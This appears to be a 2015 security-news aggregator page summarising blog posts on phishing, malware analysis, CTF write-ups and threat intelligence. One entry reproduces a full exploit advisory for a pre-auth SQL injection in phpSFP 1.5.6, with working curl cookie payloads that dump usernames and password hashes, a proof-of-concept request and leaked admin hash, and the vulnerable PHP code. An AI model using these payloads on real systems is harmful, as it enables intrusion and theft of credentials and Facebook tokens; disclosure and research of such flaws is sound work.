Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

PowerPick – A ClickOnce Adjunct

April 4, 2015, 10:45 am
$
0
0
Phishing has always been a luck of the draw situation for me on engagements. Many people say that phishing is the easiest step and while I typically agree (since you only need one successful payload to run), I find it is one of the most common areas to tip off incident responders that there is a malicious campaign occurring. On one recent engagement, phishing was quite a pain point for me as their users were very well trained and the layers of defense that my email had to go through were mind blowing. It was not long before I received notifications from spamhaus and watched responders diving in on my initial endpoints.

Thanks to the NetSPI team, I just recently discovered my new favorite phishing technique that I wish I had used in that tough case!

more here........http://www.sixdub.net/?p=555
Search

Viper 1.2 binary management and analysis framework dedicated to malware and exploit researchers release

April 4, 2015, 11:42 am
$
0
0
Today I'm happy to announce the release of Viper 1.2. This release has a suspiciously short CHANGELOG, but under the hood it comes with numerous improvements and bug fixes that should make Viper a much more stable and solid product.

One of the most visible additions to this release is a user-friendly web interface that comes as an alternative to the traditional terminal. It emulates almost entirely the functionality that you'd get through the shell, but makes it easier for people to consume the results and operate on your binary repositories.

more here........http://viper.li/blog/2015-04-04-viper-12.html

The malware campaign that went unnoticed

April 4, 2015, 12:03 pm
$
0
0
Recently, I was scanning for malware on a customers computer and ran into a unusual string of malware that targeted just the Google Chrome web browser. I removed the extension from the browser, and not even a second later it re-appeared in-front of my eyes.

I decided to look at the payload, it was dropping in AppData directory on Windows, I opened it up and found three files:

index.html

manifest.json

bigheckz.js

more here.........https://ocelot.li/the-malware-campaign-that-went-unnoticed/

Gmail’s SSL certificate for SMTP appears to have expired

April 4, 2015, 7:05 pm

phpSFP - Schedule Facebook Posts 1.5.6 Pre-auth SQL Injection (0-day)

April 5, 2015, 1:31 am
$
0
0
######################################################################
#  _     ___  _   _  ____  ____    _  _____
#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#  | |  | | | |  \| | |  _| |     / _ \ | |
#  | |__| |_| | |\  | |_| | |___ / ___ \| |
#  |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# phpSFP - Schedule Facebook Posts 1.5.6 Pre-auth SQL Injection (0-day)
# Website :
http://codecanyon.net/item/phpsfp-schedule-facebook-posts/5177393
# Exploit Author : @u0x (Pichaya Morimoto)
# Release dates : April 2, 2015
#
# Special Thanks to 2600 Thailand group:
# xelenonz, pe3z, anidear, windows98se, icheernoom, penguinarmy
https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################

[+] Description
============================================================
phpSFP – is a Platform where you can easily manage your scheduling for all
your (Facebook) pages & groups in one place.
It helps to send messages, ads, events, news and so on. phpSFP is pretty
popular more than its sale record thanks to nulled group (underground
WebApp license crackers).

[+] Background <3
============================================================
I managed to track down a group of Vietnam-based Facebook spammer which
posted ads on many FB groups I'm joined.
And ended up with a website that is modified version (all phpSFP credits
are removed) of phpSFP 1.4.1.
so I did some matching and found the original application is phpSFP.

Guess what happens when spammer mess up with offsec guy ;)

[+] Exploit
============================================================
There are many possible ways to do SQLi, I will go with error-based which
enabled by default on phpSFP xD

$ curl http://path.to.phpsfp/index.php/login -b "login=1|||1' or
extractvalue(rand(),concat(0x2e,user())) or '1|||1"

in case you don't know, for further queries you have to change 'user()' to
something else, e.g.

$ curl http://path.to.phpsfp/index.php/login  -b "login=1|||1' or
extractvalue(rand(),concat(0x2e,(select concat_ws(0x3a,username,password)
from users limit 1))) or '1|||2"

don't forgot to do length()/substr() stuffs due to limitation of 32
characters in error message


[+] Proof-of-Concept
============================================================
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7

GET /index.php/login HTTP/1.1
Host: 192.168.33.103
Proxy-Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: login=1|||1' or extractvalue(rand(),concat(0x2e,(select
concat_ws(0x3a,username,password) from users limit 1))) or '1|||2

HTTP/1.1 500 Internal Server Error
Server: Apache/2.4.7 (Ubuntu)
Date: Thu, 02 Apr 2015 13:15:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: ci_session=<deducted>; expires=Sat, 01-Apr-2017 13:15:08 GMT;
Max-Age=63072000; path=/
Content-Length: 838

<html>
<head>
<title>Database Error</title>
<style type="text/css">
....
<h1>A Database Error Occurred</h1>
        <p>Error Number: 1105</p><p>XPATH syntax error:
'admin:f0250d9b38c974122119abf826'</p><p>
....


[+] Vulnerability Analysis
============================================================
I have analyzed on 1.5.6 (latest version) and 1.4.1 (a popular edition
released by nulled group)
The bug itself is quite interesting.. the author did well in login function
but failed
to parameterized/escape SQL query in 'remember me' function in
authentication phrase.

; phpSFP 1.5.6
File: application/models/auth.php
    function cookie()
    {
        if(get_cookie('login')) <-- if 'login' cookie is setted
        {
            list($id_user, $password, $access) = explode("|||",
get_cookie('login')); <-- split by |||
            // the magic happens here
            $qusers = $this->db->query("SELECT id FROM users WHERE
id='".$id_user."' AND password='".$password."'");

; phpSFP 1.4.1, same thing but in different file
File: application/controllers/login.php
    public function index()
    {
        if(get_cookie('login')) <-- if 'login' cookie is setted
        {
            list($id_user, $password, $access) = explode("|||",
get_cookie('login')); <-- split by |||
            // the magic happens here
            $qusers = $this->db->query("SELECT id FROM users WHERE
id='".$id_user."' AND password='".$password."'");

[+] Warning
============================================================
Please DO NOT Google dork with intitle:"phpSFP - Schedule facebook posts v."
because there are ton of Facebook access_token in phpSFP database which can
be used for hijack many Facebook accounts =|

Hiding Functionality with Exception Handlers (2/2)

April 5, 2015, 1:36 am
$
0
0
This post will cover the second part of hiding functionality with exception handlers. Unlike the technique presented in the previous post, which modified the SEH record for the local thread, the aim here is to modify the SEH record for another thread in order to better hide what is actually going on. By the end of the post, there should be enough information to put together a working application capable of modifying the SEH list of any thread (barring some exceptions) and causing it to raise an exception to execute your code. The sample application will be a DLL that is injected into a process and hijacks one of its threads to perform some task.

more here......http://www.codereversing.com/blog/archives/201

Damn Vulnerable iOS App Solutions Free for Download

April 5, 2015, 4:24 am
$
0
0
I have decided to give away the solutions for DVIA for free. The reason for this has been too many people coming up with queries for the solutions and i believed giving away the solutions for free would really benefit the infosec community.

more here......http://damnvulnerableiosapp.com/#solutions

Malware Analysis: Cryptowall 3.0

April 5, 2015, 4:28 am
$
0
0
I've received this sample from Joshua Cannell from Malwarebytes
We've noticed, that it is packed in similar way like the Dofoil that I've described - however, now the packer evolved and became more tricky. I am gonna write a separate article on it's evolution, but now I want to focus on the particular sample.
In this material I describe in details how I managed to unpack it here........http://hasherezade.net/malware/cryptowall/xtube/
Search

Clickjacking coinbase with html5 sandbox

April 5, 2015, 11:23 am
$
0
0
Just like I anticipated in 2013 http://homakov.blogspot.com/2013/04/html5-sandbox-bad-idea.html sandbox was a bad idea.

As a payment gateway you do your best to seamlessly integrate with your customers and allow showing checkout in iframes. To prevent basic clickjacking you have data-confirm attribute on Pay button.

However with HTML5 sandbox we can completely switch off Javascript in that iframe, but forms will keep working

more here........https://hackerone.com/reports/54733

Why SCRUM Backlogs lead to bad Product Decisions

April 5, 2015, 11:25 am

TR-069 with Routers – Informing Isn’t Always Best

April 5, 2015, 11:28 am
$
0
0
So I first came interested into “router hacking” in the past few weeks, I’m going to have future posts on my findings because it’s such an interesting area that I don’t think enough people look at. I first started getting interested in analysing routers and dissecting the inner workings of them when I was watching a DEFCON 22 talk on the TR-069 protocol. If anyone hasn’t seen it, I have it below. The TR-069 protocol allows your ISP to interact with your CPE (Customer Premises Equipment), essentially your router. One of the big things it’s used for is upgrading your firmware on your router, can we see something wrong with that?

more here........http://itsjack.cc/blog/2015/04/tr-069-with-routers-informing-isnt-always-best/

InsomniDroid Part 2 - Write-Up

April 5, 2015, 11:33 am
$
0
0
Insomni'hack's CTF included iOS challenges, but also an Android challenge in two parts.
The write-up of part 1 of the Android challenge can be found on SCRT's blog. It is quite complicated, but in the end, we get a decrypted filesystem with the flag for part 1, and an Android application to investigate for part 2

87f10242d7662a9cf8158bd85e4a17df9279a961f1d2a2e469cfd1be5501bfa1  ch.scrt.insomnidroid-1.apk
According to the text of part 2, we are meant to find a way to buy movies without paying.

more here.......http://blog.fortinet.com/post/insomnidroid-part-2-write-up

react-native-html-webview

April 5, 2015, 2:28 pm
$
0
0
Display (possibly untrusted) HTML using a UIWebView in React Native.

Uses an HTML Sanitizer to remove only let through a whitelist of tags and attributes (so it removes all javascript). Also supports automatically adjusting the height of the webview to contain the contents you give it.

more here..........https://github.com/almost/react-native-html-webview

White Paper: Threat Intelligence: Collecting, Analysing, Evaluating

April 5, 2015, 2:34 pm
$
0
0
The promise of threat intelligence is alluring. It should help organisations to understand
and manage business risk – to turn unknown threats into known and mitigated threats,
and to improve the effectiveness of defence. After all, targeted attacks need targeted
defence. If analysis is performed correctly, the products of threat intelligence can be
genuinely useful to a business, providing real benefits at all levels, from on-theground
defenders to the board.

However, threat intelligence is currently very loosely defined, with little agreed
consensus on what it is and how to use it.

There is a risk that in the hurry to keep up with the threat intelligence trend,
organisations will end up paying large amounts of money for products that are
interesting but of little value in terms of improving the security of their business.
‘Doing’ threat intelligence is important – but doing it right is critical.

To address this, MWR InfoSecurity reviewed the area and designed a framework for
threat intelligence that can be scaled to different sectors, sizes of organisation,
and organisational goals. The paper is the product of literature reviews, internal
experience, and a large number of interviews with people involved in threat intelligence
and related fields across a range of organisations.

more here......http://www.cpni.gov.uk/Documents/Publications/2015/23-March-2015-MWR_Threat_Intelligence_whitepaper-2015.pdf

Anonymous/Ghost Security Releasing ISIS Web Host List & 14,000 Twitter Accounts Calling This Operation ISIS To Help Quash ISIS Propoganda

April 5, 2015, 2:48 pm
$
0
0
Islamic State Website Hosting Company Archive

All websites listed below are frequently used by the Islamic State through
Twitter and other social media platforms for transmission of propaganda,
religion, recruitment, communications and intelligence gathering purposes.
Next to the URL you will find the company hosting content for that website.

more here......https://ghostbin.com/paste/st4m5

14,000 ISIS Twitter Accounts released here.......http://pastebin.com/zZffB762
Search

NDH2k15 updator & crackme prime writeup

April 5, 2015, 5:21 pm
$
0
0
1.
Updator was an exploitation challenge worth 200 pts. A URL is given when we access it we're asked to enter a username/password, and there's a link to http://updator.challs.nuitduhack.com/update.py We can access the update.pyc file from http://updator.challs.nuitduhack.com/update.pyc which is a compiled version of the module. Reverse engineering/decompiling the bytecode and getting the following here.........http://blog.0x80.org/ndh2k15-updator-writeup/

2.
Crackme prime was a crackme challenge worth 150 pts. A binary is provided. Let start by looking at main @ 0x08048deb we see that it takes input which must be of length 0x1d and contains no ascii 0 then it splits the input to 6 parts expecting something like 1111-2222-3333-4444-5555-6666. For all parts it does the following here..........http://blog.0x80.org/ndh2k15-crackme-prime-writeup/

NDH2k15 Cooper (Stegano 300), SecureAuth (Exploit 350), BPYTHONASTIC (Forensic 300), SUPERMAN (Reverse 500), Mass Surveillance Software (Reverse 300), Clark Kent (Revserse 150) & Crackme Prime (Revserse 150) writeups

April 5, 2015, 5:38 pm
$
0
0
Writeups are in French so utilize translation software or a human translator if you do not speak the language

1. Write-up Cooper (Stegano 300) here.... https://wiki.zenk-security.com/doku.php?id=ndhquals2015:cooper

2.Write-up SecureAuth (Exploit 350) here.... https://wiki.zenk-security.com/doku.php?id=ndhquals2015:secureauth

3.Write-up BPYTHONASTIC (Forensic 300) here....  https://wiki.zenk-security.com/doku.php?id=ndhquals2015:bpythonastic

4.Write-up SUPERMAN (Reverse 500) here.... https://wiki.zenk-security.com/doku.php?id=ndhquals2015:superman

5.Write-up Mass Surveillance Software (Revserse 300) here....  https://wiki.zenk-security.com/doku.php?id=ndhquals2015:mass_surveillance_software

6.Write-up Clark Kent (Revserse 150) here....  https://wiki.zenk-security.com/doku.php?id=ndhquals2015:clark_kent

7.Write-up Crackme Prime (Revserse 150) here....  https://wiki.zenk-security.com/doku.php?id=ndhquals2015:crackme_prime


You can also find additional writeups from NDH2k here.....https://hexpresso.wordpress.com/2015/04/05/quals_ndh-2k15-pdception-misc-500-writeup/

VirtualBox Detection Via WQL Queries

April 5, 2015, 7:28 pm

Using different public online malware analyser tools

April 6, 2015, 1:14 am
$
0
0
Analyzing malware and extracting useful detection indicators (Indicators of Compromise, IOCs) for protecting your customers is a recurrent task if you do incident response. If you have your own malware analysis environment and you receive a suspected malicious file then uploading the file for processing and waiting for the analysis is one of the first steps in this process. However sometimes you have to rely on using different public online malware analyser tool for getting the results.

I used VMRay a couple of times for doing automated malware analysis for CERTs but for a recent sample I wanted to rely on public available information.

more here.....http://www.vanimpe.eu/2015/04/05/using-different-online-malware-analyser-tools/

CRYPVAULT: New Crypto-ransomware Encrypts and “Quarantines” Files

April 6, 2015, 5:33 am
Viewing all 8064 articles
Browse latest View live
Search